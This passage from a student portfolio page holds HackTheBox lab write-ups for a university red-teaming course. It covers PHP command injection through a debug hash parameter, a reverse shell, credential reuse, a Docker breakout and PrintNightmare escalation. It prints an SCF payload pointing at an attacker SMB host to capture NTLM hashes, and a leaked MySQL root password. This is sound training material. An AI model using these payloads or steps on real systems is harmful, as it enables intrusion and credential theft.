                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
